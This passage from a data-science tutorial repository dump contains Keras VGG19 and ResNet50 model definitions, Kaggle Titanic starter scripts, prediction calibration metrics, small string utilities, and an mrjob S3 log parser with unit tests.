preprocess_input(x) print('Input image shape:', x.shape) preds = model.predict(x) print('Predicted:', decode_predictions(preds)) File: deep-learning/keras-tutorial/deep_learning_models/vgg19.py # -*- coding: utf-8 -*- '''VGG19 model for Keras. # Reference: - [Very Deep Convolutional Networks for Large-Scale Image Recognition](https://arxiv.org/abs/1409.1556) ''' from __future__ import print_function import numpy as np import warnings from keras.models import Model from keras.layers import Flatten, Dense, Input from keras.layers import Convolution2D, MaxPooling2D from keras.preprocessing import image from keras.utils.layer_utils import convert_all_kernels_in_model from keras.utils.data_utils import get_file from keras import backend as K TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_th_dim_ordering_th_kernels.h5' TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_tf_dim_ordering_tf_kernels.h5' TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_th_dim_ordering_th_kernels_notop.h5' TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_tf_dim_ordering_tf_kernels_notop.h5' def VGG19(include_top=True, weights='imagenet', input_tensor=None): '''Instantiate the VGG19 architecture, optionally loading weights pre-trained on ImageNet. Note that when using TensorFlow, for best performance you should set `image_dim_ordering="tf"` in your Keras config at ~/.keras/keras.json. The model and the weights are compatible with both TensorFlow and Theano. The dimension ordering convention used by the model is the one specified in your Keras config file. # Arguments include_top: whether to include the 3 fully-connected layers at the top of the network. weights: one of `None` (random initialization) or "imagenet" (pre-training on ImageNet). input_tensor: optional Keras tensor (i.e. output of `layers.Input()`) to use as image input for the model. # Returns A Keras model instance. ''' if weights not in {'imagenet', None}: raise ValueError('The `weights` argument should be either ' '`None` (random initialization) or `imagenet` ' '(pre-training on ImageNet).') # Determine proper input shape if K.image_dim_ordering() == 'th': if include_top: input_shape = (3, 224, 224) else: input_shape = (3, None, None) else: if include_top: input_shape = (224, 224, 3) else: input_shape = (None, None, 3) if input_tensor is None: img_input = Input(shape=input_shape) else: if not K.is_keras_tensor(input_tensor): img_input = Input(tensor=input_tensor) else: img_input = input_tensor # Block 1 x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv1')(img_input) x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x) # Block 2 x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv1')(x) x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x) # Block 3 x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv1')(x) x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv2')(x) x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv3')(x) x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv4')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x) # Block 4 x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv1')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv2')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv3')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv4')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x) # Block 5 x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv1')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv2')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv3')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv4')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x) if include_top: # Classification block x = Flatten(name='flatten')(x) x = Dense(4096, activation='relu', name='fc1')(x) x = Dense(4096, activation='relu', name='fc2')(x) x = Dense(1000, activation='softmax', name='predictions')(x) # Create model model = Model(img_input, x) # load weights if weights == 'imagenet': print('K.image_dim_ordering:', K.image_dim_ordering()) if K.image_dim_ordering() == 'th': if include_top: weights_path = get_file('vgg19_weights_th_dim_ordering_th_kernels.h5', TH_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('vgg19_weights_th_dim_ordering_th_kernels_notop.h5', TH_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'tensorflow': warnings.warn('You are using the TensorFlow backend, yet you ' 'are using the Theano ' 'image dimension ordering convention ' '(`image_dim_ordering="th"`). ' 'For best performance, set ' '`image_dim_ordering="tf"` in ' 'your Keras config ' 'at ~/.keras/keras.json.') convert_all_kernels_in_model(model) else: if include_top: weights_path = get_file('vgg19_weights_tf_dim_ordering_tf_kernels.h5', TF_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('vgg19_weights_tf_dim_ordering_tf_kernels_notop.h5', TF_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'theano': convert_all_kernels_in_model(model) return model if __name__ == '__main__': model = VGG19(include_top=True, weights='imagenet') img_path = 'cat.jpg' img = image.load_img(img_path, target_size=(224, 224)) x = image.img_to_array(img) x = np.expand_dims(x, axis=0) x = preprocess_input(x) print('Input image shape:', x.shape) preds = model.predict(x) print('Predicted:', decode_predictions(preds)) File: deep-learning/keras-tutorial/deep_learning_models/resnet50.py # -*- coding: utf-8 -*- '''ResNet50 model for Keras. # Reference: - [Deep Residual Learning for Image Recognition](https://arxiv.org/abs/1512.03385) Adapted from code contributed by BigMoyan. ''' from __future__ import print_function import numpy as np import warnings from keras.layers import merge, Input from keras.layers import Dense, Activation, Flatten from keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D, AveragePooling2D from keras.layers import BatchNormalization from keras.models import Model from keras.preprocessing import image import keras.backend as K from keras.utils.layer_utils import convert_all_kernels_in_model from keras.utils.data_utils import get_file TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/resnet50_weights_th_dim_ordering_th_kernels.h5' TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/resnet50_weights_tf_dim_ordering_tf_kernels.h5' TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/resnet50_weights_th_dim_ordering_th_kernels_notop.h5' TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5' def identity_block(input_tensor, kernel_size, filters, stage, block): '''The identity_block is the block that has no conv layer at shortcut # Arguments input_tensor: input tensor kernel_size: defualt 3, the kernel size of middle conv layer at main path filters: list of integers, the nb_filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names ''' nb_filter1, nb_filter2, nb_filter3 = filters if K.image_dim_ordering() == 'tf': bn_axis = 3 else: bn_axis = 1 conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = Convolution2D(nb_filter1, 1, 1, name=conv_name_base + '2a')(input_tensor) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x) x = Activation('relu')(x) x = Convolution2D(nb_filter2, kernel_size, kernel_size, border_mode='same', name=conv_name_base + '2b')(x) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x) x = Activation('relu')(x) x = Convolution2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x) x = merge([x, input_tensor], mode='sum') x = Activation('relu')(x) return x def conv_block(input_tensor, kernel_size, filters, stage, block, strides=(2, 2)): '''conv_block is the block that has a conv layer at shortcut # Arguments input_tensor: input tensor kernel_size: defualt 3, the kernel size of middle conv layer at main path filters: list of integers, the nb_filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names Note that from stage 3, the first conv layer at main path is with subsample=(2,2) And the shortcut should have subsample=(2,2) as well ''' nb_filter1, nb_filter2, nb_filter3 = filters if K.image_dim_ordering() == 'tf': bn_axis = 3 else: bn_axis = 1 conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = Convolution2D(nb_filter1, 1, 1, subsample=strides, name=conv_name_base + '2a')(input_tensor) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x) x = Activation('relu')(x) x = Convolution2D(nb_filter2, kernel_size, kernel_size, border_mode='same', name=conv_name_base + '2b')(x) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x) x = Activation('relu')(x) x = Convolution2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x) shortcut = Convolution2D(nb_filter3, 1, 1, subsample=strides, name=conv_name_base + '1')(input_tensor) shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1')(shortcut) x = merge([x, shortcut], mode='sum') x = Activation('relu')(x) return x def ResNet50(include_top=True, weights='imagenet', input_tensor=None): '''Instantiate the ResNet50 architecture, optionally loading weights pre-trained on ImageNet. Note that when using TensorFlow, for best performance you should set `image_dim_ordering="tf"` in your Keras config at ~/.keras/keras.json. The model and the weights are compatible with both TensorFlow and Theano. The dimension ordering convention used by the model is the one specified in your Keras config file. # Arguments include_top: whether to include the 3 fully-connected layers at the top of the network. weights: one of `None` (random initialization) or "imagenet" (pre-training on ImageNet). input_tensor: optional Keras tensor (i.e. xput of `layers.Input()`) to use as image input for the model. # Returns A Keras model instance. ''' if weights not in {'imagenet', None}: raise ValueError('The `weights` argument should be either ' '`None` (random initialization) or `imagenet` ' '(pre-training on ImageNet).') # Determine proper input shape if K.image_dim_ordering() == 'th': if include_top: input_shape = (3, 224, 224) else: input_shape = (3, None, None) else: if include_top: input_shape = (224, 224, 3) else: input_shape = (None, None, 3) if input_tensor is None: img_input = Input(shape=input_shape) else: if not K.is_keras_tensor(input_tensor): img_input = Input(tensor=input_tensor) else: img_input = input_tensor if K.image_dim_ordering() == 'tf': bn_axis = 3 else: bn_axis = 1 x = ZeroPadding2D((3, 3))(img_input) x = Convolution2D(64, 7, 7, subsample=(2, 2), name='conv1')(x) x = BatchNormalization(axis=bn_axis, name='bn_conv1')(x) x = Activation('relu')(x) x = MaxPooling2D((3, 3), strides=(2, 2))(x) x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1)) x = identity_block(x, 3, [64, 64, 256], stage=2, block='b') x = identity_block(x, 3, [64, 64, 256], stage=2, block='c') x = conv_block(x, 3, [128, 128, 512], stage=3, block='a') x = identity_block(x, 3, [128, 128, 512], stage=3, block='b') x = identity_block(x, 3, [128, 128, 512], stage=3, block='c') x = identity_block(x, 3, [128, 128, 512], stage=3, block='d') x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a') x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b') x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c') x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d') x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e') x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f') x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a') x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b') x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c') x = AveragePooling2D((7, 7), name='avg_pool')(x) if include_top: x = Flatten()(x) x = Dense(1000, activation='softmax', name='fc1000')(x) model = Model(img_input, x) # load weights if weights == 'imagenet': print('K.image_dim_ordering:', K.image_dim_ordering()) if K.image_dim_ordering() == 'th': if include_top: weights_path = get_file('resnet50_weights_th_dim_ordering_th_kernels.h5', TH_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('resnet50_weights_th_dim_ordering_th_kernels_notop.h5', TH_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'tensorflow': warnings.warn('You are using the TensorFlow backend, yet you ' 'are using the Theano ' 'image dimension ordering convention ' '(`image_dim_ordering="th"`). ' 'For best performance, set ' '`image_dim_ordering="tf"` in ' 'your Keras config ' 'at ~/.keras/keras.json.') convert_all_kernels_in_model(model) else: if include_top: weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels.h5', TF_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5', TF_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'theano': convert_all_kernels_in_model(model) return model if __name__ == '__main__': model = ResNet50(include_top=True, weights='imagenet') img_path = 'elephant.jpg' img = image.load_img(img_path, target_size=(224, 224)) x = image.img_to_array(img) x = np.expand_dims(x, axis=0) x = preprocess_input(x) print('Input image shape:', x.shape) preds = model.predict(x) print('Predicted:', decode_predictions(preds)) File: deep-learning/keras-tutorial/solutions/sol_112.py ann = ANN(2, 10, 1) %timeit -n 1 -r 1 ann.train(zip(X,y), iterations=100) plot_decision_boundary(ann) plt.title("Our model with 10 hidden units and 100 iterations") File: deep-learning/keras-tutorial/solutions/sol_111.py ann = ANN(2, 10, 1) %timeit -n 1 -r 1 ann.train(zip(X,y), iterations=2) plot_decision_boundary(ann) plt.title("Our next model with 10 hidden units") File: kaggle/__init__.py File: numpy/__init__.py File: analyses/churn_measurements.py from __future__ import division import numpy as np __author__ = "Eric Chiang" __email__ = "eric[at]yhathq.com" """ Measurements inspired by Philip Tetlock's "Expert Political Judgment" Equations take from Yaniv, Yates, & Smith (1991): "Measures of Descrimination Skill in Probabilistic Judgement" """ def calibration(prob,outcome,n_bins=10): """Calibration measurement for a set of predictions. When predicting events at a given probability, how far is frequency of positive outcomes from that probability? NOTE: Lower scores are better prob: array_like, float Probability estimates for a set of events outcome: array_like, bool If event predicted occurred n_bins: int Number of judgement categories to prefrom calculation over. Prediction are binned based on probability, since "descrete" probabilities aren't required. """ prob = np.array(prob) outcome = np.array(outcome) c = 0.0 # Construct bins judgement_bins = np.arange(n_bins + 1) / n_bins # Which bin is each prediction in? bin_num = np.digitize(prob,judgement_bins) for j_bin in np.unique(bin_num): # Is event in bin in_bin = bin_num == j_bin # Predicted probability taken as average of preds in bin predicted_prob = np.mean(prob[in_bin]) # How often did events in this bin actually happen? true_bin_prob = np.mean(outcome[in_bin]) # Squared distance between predicted and true times num of obs c += np.sum(in_bin) * ((predicted_prob - true_bin_prob) ** 2) return c / len(prob) def discrimination(prob,outcome,n_bins=10): """Discrimination measurement for a set of predictions. For each judgement category, how far from the base probability is the true frequency of that bin? NOTE: High scores are better prob: array_like, float Probability estimates for a set of events outcome: array_like, bool If event predicted occurred n_bins: int Number of judgement categories to prefrom calculation over. Prediction are binned based on probability, since "descrete" probabilities aren't required. """ prob = np.array(prob) outcome = np.array(outcome) d = 0.0 # Base frequency of outcomes base_prob = np.mean(outcome) # Construct bins judgement_bins = np.arange(n_bins + 1) / n_bins # Which bin is each prediction in? bin_num = np.digitize(prob,judgement_bins) for j_bin in np.unique(bin_num): in_bin = bin_num == j_bin true_bin_prob = np.mean(outcome[in_bin]) # Squared distance between true and base times num of obs d += np.sum(in_bin) * ((true_bin_prob - base_prob) ** 2) return d / len(prob) File: analyses/__init__.py File: python-data/transform_util.py import re class TransformUtil: @classmethod def remove_punctuation(cls, value): """Removes !, #, and ?. """ return re.sub('[!#?]', '', value) @classmethod def clean_strings(cls, strings, ops): """General purpose method to clean strings. Pass in a sequence of strings and the operations to perform. """ result = [] for value in strings: for function in ops: value = function(value) result.append(value) return result File: python-data/__init__.py File: python-data/type_util.py class TypeUtil: @classmethod def is_iterable(cls, obj): """Determines if obj is iterable. Useful when writing functions that can accept multiple types of input (list, tuple, ndarray, iterator). Pairs well with convert_to_list. """ try: iter(obj) return True except TypeError: return False @classmethod def convert_to_list(cls, obj): """Converts obj to a list if it is not a list and it is iterable, else returns the original obj. """ if not isinstance(obj, list) and cls.is_iterable(obj): obj = list(obj) return obj File: matplotlib/__init__.py File: aws/__init__.py File: commands/__init__.py File: data/titanic/myfirstforest.py """ Writing my first randomforest code. Author : AstroDave Date : 23rd September 2012 Revised: 15 April 2014 please see packages.python.org/milk/randomforests.html for more """ import pandas as pd import numpy as np import csv as csv from sklearn.ensemble import RandomForestClassifier # Data cleanup # TRAIN DATA train_df = pd.read_csv('train.csv', header=0) # Load the train file into a dataframe # I need to convert all strings to integer classifiers. # I need to fill in the missing values of the data and make it complete. # female = 0, Male = 1 train_df['Gender'] = train_df['Sex'].map( {'female': 0, 'male': 1} ).astype(int) # Embarked from 'C', 'Q', 'S' # Note this is not ideal: in translating categories to numbers, Port "2" is not 2 times greater than Port "1", etc. # All missing Embarked -> just make them embark from most common place if len(train_df.Embarked[ train_df.Embarked.isnull() ]) > 0: train_df.Embarked[ train_df.Embarked.isnull() ] = train_df.Embarked.dropna().mode().values Ports = list(enumerate(np.unique(train_df['Embarked']))) # determine all values of Embarked, Ports_dict = { name : i for i, name in Ports } # set up a dictionary in the form Ports : index train_df.Embarked = train_df.Embarked.map( lambda x: Ports_dict[x]).astype(int) # Convert all Embark strings to int # All the ages with no data -> make the median of all Ages median_age = train_df['Age'].dropna().median() if len(train_df.Age[ train_df.Age.isnull() ]) > 0: train_df.loc[ (train_df.Age.isnull()), 'Age'] = median_age # Remove the Name column, Cabin, Ticket, and Sex (since I copied and filled it to Gender) train_df = train_df.drop(['Name', 'Sex', 'Ticket', 'Cabin', 'PassengerId'], axis=1) # TEST DATA test_df = pd.read_csv('test.csv', header=0) # Load the test file into a dataframe # I need to do the same with the test data now, so that the columns are the same as the training data # I need to convert all strings to integer classifiers: # female = 0, Male = 1 test_df['Gender'] = test_df['Sex'].map( {'female': 0, 'male': 1} ).astype(int) # Embarked from 'C', 'Q', 'S' # All missing Embarked -> just make them embark from most common place if len(test_df.Embarked[ test_df.Embarked.isnull() ]) > 0: test_df.Embarked[ test_df.Embarked.isnull() ] = test_df.Embarked.dropna().mode().values # Again convert all Embarked strings to int test_df.Embarked = test_df.Embarked.map( lambda x: Ports_dict[x]).astype(int) # All the ages with no data -> make the median of all Ages median_age = test_df['Age'].dropna().median() if len(test_df.Age[ test_df.Age.isnull() ]) > 0: test_df.loc[ (test_df.Age.isnull()), 'Age'] = median_age # All the missing Fares -> assume median of their respective class if len(test_df.Fare[ test_df.Fare.isnull() ]) > 0: median_fare = np.zeros(3) for f in range(0,3): # loop 0 to 2 median_fare[f] = test_df[ test_df.Pclass == f+1 ]['Fare'].dropna().median() for f in range(0,3): # loop 0 to 2 test_df.loc[ (test_df.Fare.isnull()) & (test_df.Pclass == f+1 ), 'Fare'] = median_fare[f] # Collect the test data's PassengerIds before dropping it ids = test_df['PassengerId'].values # Remove the Name column, Cabin, Ticket, and Sex (since I copied and filled it to Gender) test_df = test_df.drop(['Name', 'Sex', 'Ticket', 'Cabin', 'PassengerId'], axis=1) # The data is now ready to go. So lets fit to the train, then predict to the test! # Convert back to a numpy array train_data = train_df.values test_data = test_df.values print 'Training...' forest = RandomForestClassifier(n_estimators=100) forest = forest.fit( train_data[0::,1::], train_data[0::,0] ) print 'Predicting...' output = forest.predict(test_data).astype(int) predictions_file = open("myfirstforest.csv", "wb") open_file_object = csv.writer(predictions_file) open_file_object.writerow(["PassengerId","Survived"]) open_file_object.writerows(zip(ids, output)) predictions_file.close() print 'Done.' File: data/titanic/gendermodel.py """ This simple code is desinged to teach a basic user to read in the files in python, simply find what proportion of males and females survived and make a predictive model based on this Author : AstroDave Date : 18 September 2012 Revised: 28 March 2014 """ import csv as csv import numpy as np csv_file_object = csv.reader(open('train.csv', 'rb')) # Load in the csv file header = csv_file_object.next() # Skip the fist line as it is a header data=[] # Create a variable to hold the data for row in csv_file_object: # Skip through each row in the csv file, data.append(row[0:]) # adding each row to the data variable data = np.array(data) # Then convert from a list to an array. # Now I have an array of 12 columns and 891 rows # I can access any element I want, so the entire first column would # be data[0::,0].astype(np.float) -- This means all of the rows (from start to end), in column 0 # I have to add the .astype() command, because # when appending the rows, python thought it was a string - so needed to convert # Set some variables number_passengers = np.size(data[0::,1].astype(np.float)) number_survived = np.sum(data[0::,1].astype(np.float)) proportion_survivors = number_survived / number_passengers # I can now find the stats of all the women on board, # by making an array that lists True/False whether each row is female women_only_stats = data[0::,4] == "female" # This finds where all the women are men_only_stats = data[0::,4] != "female" # This finds where all the men are (note != means 'not equal') # I can now filter the whole data, to find statistics for just women, by just placing # women_only_stats as a "mask" on my full data -- Use it in place of the '0::' part of the array index. # You can test it by placing it there, and requesting column index [4], and the output should all read 'female' # e.g. try typing this: data[women_only_stats,4] women_onboard = data[women_only_stats,1].astype(np.float) men_onboard = data[men_only_stats,1].astype(np.float) # and derive some statistics about them proportion_women_survived = np.sum(women_onboard) / np.size(women_onboard) proportion_men_survived = np.sum(men_onboard) / np.size(men_onboard) print 'Proportion of women who survived is %s' % proportion_women_survived print 'Proportion of men who survived is %s' % proportion_men_survived # Now that I have my indicator that women were much more likely to survive, # I am done with the training set. # Now I will read in the test file and write out my simplistic prediction: # if female, then model that she survived (1) # if male, then model that he did not survive (0) # First, read in test.csv test_file = open('test.csv', 'rb') test_file_object = csv.reader(test_file) header = test_file_object.next() # Also open the a new file so I can write to it. Call it something descriptive # Finally, loop through each row in the train file, and look in column index [3] (which is 'Sex') # Write out the PassengerId, and my prediction. predictions_file = open("gendermodel.csv", "wb") predictions_file_object = csv.writer(predictions_file) predictions_file_object.writerow(["PassengerId", "Survived"]) # write the column headers for row in test_file_object: # For each row in test file, if row[3] == 'female': # is it a female, if yes then predictions_file_object.writerow([row[0], "1"]) # write the PassengerId, and predict 1 else: # or else if male, predictions_file_object.writerow([row[0], "0"]) # write the PassengerId, and predict 0. test_file.close() # Close out the files. predictions_file.close() File: data/titanic/genderclassmodel.py """ Now that the user can read in a file this creates a model which uses the price, class and gender Author : AstroDave Date : 18th September 2012 Revised : 28 March 2014 """ import csv as csv import numpy as np csv_file_object = csv.reader(open('train.csv', 'rb')) # Load in the csv file header = csv_file_object.next() # Skip the fist line as it is a header data=[] # Create a variable to hold the data for row in csv_file_object: # Skip through each row in the csv file data.append(row) # adding each row to the data variable data = np.array(data) # Then convert from a list to an array # In order to analyse the price column I need to bin up that data # here are my binning parameters, the problem we face is some of the fares are very large # So we can either have a lot of bins with nothing in them or we can just lose some # information by just considering that anythng over 39 is simply in the last bin. # So we add a ceiling fare_ceiling = 40 # then modify the data in the Fare column to = 39, if it is greater or equal to the ceiling data[ data[0::,9].astype(np.float) >= fare_ceiling, 9 ] = fare_ceiling - 1.0 fare_bracket_size = 10 number_of_price_brackets = fare_ceiling / fare_bracket_size number_of_classes = 3 # I know there were 1st, 2nd and 3rd classes on board. number_of_classes = len(np.unique(data[0::,2])) # But it's better practice to calculate this from the Pclass directly: # just take the length of an array of UNIQUE values in column index 2 # This reference matrix will show the proportion of survivors as a sorted table of # gender, class and ticket fare. # First initialize it with all zeros survival_table = np.zeros([2,number_of_classes,number_of_price_brackets],float) # I can now find the stats of all the women and men on board for i in xrange(number_of_classes): for j in xrange(number_of_price_brackets): women_only_stats = data[ (data[0::,4] == "female") \ & (data[0::,2].astype(np.float) == i+1) \ & (data[0:,9].astype(np.float) >= j*fare_bracket_size) \ & (data[0:,9].astype(np.float) < (j+1)*fare_bracket_size), 1] men_only_stats = data[ (data[0::,4] != "female") \ & (data[0::,2].astype(np.float) == i+1) \ & (data[0:,9].astype(np.float) >= j*fare_bracket_size) \ & (data[0:,9].astype(np.float) < (j+1)*fare_bracket_size), 1] #if i == 0 and j == 3: survival_table[0,i,j] = np.mean(women_only_stats.astype(np.float)) # Female stats survival_table[1,i,j] = np.mean(men_only_stats.astype(np.float)) # Male stats # Since in python if it tries to find the mean of an array with nothing in it # (such that the denominator is 0), then it returns nan, we can convert these to 0 # by just saying where does the array not equal the array, and set these to 0. survival_table[ survival_table != survival_table ] = 0. # Now I have my proportion of survivors, simply round them such that if <0.5 # I predict they dont surivive, and if >= 0.5 they do survival_table[ survival_table < 0.5 ] = 0 survival_table[ survival_table >= 0.5 ] = 1 # Now I have my indicator I can read in the test file and write out # if a women then survived(1) if a man then did not survived (0) # First read in test test_file = open('test.csv', 'rb') test_file_object = csv.reader(test_file) header = test_file_object.next() # Also open the a new file so I can write to it. predictions_file = open("genderclassmodel.csv", "wb") predictions_file_object = csv.writer(predictions_file) predictions_file_object.writerow(["PassengerId", "Survived"]) # First thing to do is bin up the price file for row in test_file_object: for j in xrange(number_of_price_brackets): # If there is no fare then place the price of the ticket according to class try: row[8] = float(row[8]) # No fare recorded will come up as a string so # try to make it a float except: # If fails then just bin the fare according to the class bin_fare = 3 - float(row[1]) break # Break from the loop and move to the next row if row[8] > fare_ceiling: # Otherwise now test to see if it is higher # than the fare ceiling we set earlier bin_fare = number_of_price_brackets - 1 break # And then break to the next row if row[8] >= j*fare_bracket_size\ and row[8] < (j+1)*fare_bracket_size: # If passed these tests then loop through # each bin until you find the right one # append it to the bin_fare # and move to the next loop bin_fare = j break # Now I have the binned fare, passenger class, and whether female or male, we can # just cross ref their details with our survival table if row[3] == 'female': predictions_file_object.writerow([row[0], "%d" % int(survival_table[ 0, float(row[1]) - 1, bin_fare ])]) else: predictions_file_object.writerow([row[0], "%d" % int(survival_table[ 1, float(row[1]) - 1, bin_fare])]) # Close out the files test_file.close() predictions_file.close() File: mapreduce/__init__.py File: mapreduce/test_mr_s3_log_parser.py from StringIO import StringIO import unittest2 as unittest from mr_s3_log_parser import MrS3LogParser class MrTestsUtil: def run_mr_sandbox(self, mr_job, stdin): # inline runs the job in the same process so small jobs tend to # run faster and stack traces are simpler # --no-conf prevents options from local mrjob.conf from polluting # the testing environment # "-" reads from standard in mr_job.sandbox(stdin=stdin) # make_runner ensures job cleanup is performed regardless of # success or failure with mr_job.make_runner() as runner: runner.run() for line in runner.stream_output(): key, value = mr_job.parse_output_line(line) yield value class TestMrS3LogParser(unittest.TestCase): mr_job = None mr_tests_util = None RAW_LOG_LINE_INVALID = \ '00000fe9688b6e57f75bd2b7f7c1610689e8f01000000' \ '00000388225bcc00000 ' \ 's3-storage [22/Jul/2013:21:03:27 +0000] ' \ '00.111.222.33 ' \ RAW_LOG_LINE_VALID = \ '00000fe9688b6e57f75bd2b7f7c1610689e8f01000000' \ '00000388225bcc00000 ' \ 's3-storage [22/Jul/2013:21:03:27 +0000] ' \ '00.111.222.33 ' \ 'arn:aws:sts::000005646931:federated-user/user 00000AB825500000 ' \ 'REST.HEAD.OBJECT user/file.pdf ' \ '"HEAD /user/file.pdf?versionId=00000XMHZJp6DjM9x500000' \ '00000SDZk ' \ 'HTTP/1.1" 200 - - 4000272 18 - "-" ' \ '"Boto/2.5.1 (darwin) USER-AGENT/1.0.14.0" ' \ '00000XMHZJp6DjM9x5JVEAMo8MG00000' DATE_TIME_ZONE_INVALID = "AB/Jul/2013:21:04:17 +0000" DATE_TIME_ZONE_VALID = "22/Jul/2013:21:04:17 +0000" DATE_VALID = "2013-07-22" DATE_TIME_VALID = "2013-07-22 21:04:17" TIME_ZONE_VALID = "+0000" def __init__(self, *args, **kwargs): super(TestMrS3LogParser, self).__init__(*args, **kwargs) self.mr_job = MrS3LogParser(['-r', 'inline', '--no-conf', '-']) self.mr_tests_util = MrTestsUtil() def test_invalid_log_lines(self): stdin = StringIO(self.RAW_LOG_LINE_INVALID) for result in self.mr_tests_util.run_mr_sandbox(self.mr_job, stdin): self.assertEqual(result.find("Error"), 0) def test_valid_log_lines(self): stdin = StringIO(self.RAW_LOG_LINE_VALID) for result in self.mr_tests_util.run_mr_sandbox(self.mr_job, stdin): self.assertEqual(result.find("Error"), -1) def test_clean_date_time_zone(self): date, date_time, time_zone_parsed = \ self.mr_job.clean_date_time_zone(self.DATE_TIME_ZONE_VALID) self.assertEqual(date, self.DATE_VALID) self.assertEqual(date_time, self.DATE_TIME_VALID) self.assertEqual(time_zone_parsed, self.TIME_ZONE_VALID) # Use a lambda to delay the calling of clean_date_time_zone so that # assertRaises has enough time to handle it properly self.assertRaises(ValueError, lambda: self.mr_job.clean_date_time_zone( self.DATE_TIME_ZONE_INVALID)) if __name__ == '__main__': unittest.main() File: mapreduce/mr_s3_log_parser.py import time from mrjob.job import MRJob from mrjob.protocol import RawValueProtocol, ReprProtocol import re class MrS3LogParser(MRJob): """Parses the logs from S3 based on the S3 logging format: http://docs.aws.amazon.com/AmazonS3/latest/dev/LogFormat.html Aggregates a user's daily requests by user agent and operation Outputs date_time, requester, user_agent, operation, count """ LOGPATS = r'(\S+) (\S+) \[(.*?)\] (\S+) (\S+) ' \ r'(\S+) (\S+) (\S+) ("([^"]+)"|-) ' \ r'(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) ' \ r'("([^"]+)"|-) ("([^"]+)"|-)' NUM_ENTRIES_PER_LINE = 17 logpat = re.compile(LOGPATS) (S3_LOG_BUCKET_OWNER, S3_LOG_BUCKET, S3_LOG_DATE_TIME, S3_LOG_IP, S3_LOG_REQUESTER_ID, S3_LOG_REQUEST_ID, S3_LOG_OPERATION, S3_LOG_KEY, S3_LOG_HTTP_METHOD, S3_LOG_HTTP_STATUS, S3_LOG_S3_ERROR, S3_LOG_BYTES_SENT, S3_LOG_OBJECT_SIZE, S3_LOG_TOTAL_TIME, S3_LOG_TURN_AROUND_TIME, S3_LOG_REFERER, S3_LOG_USER_AGENT) = 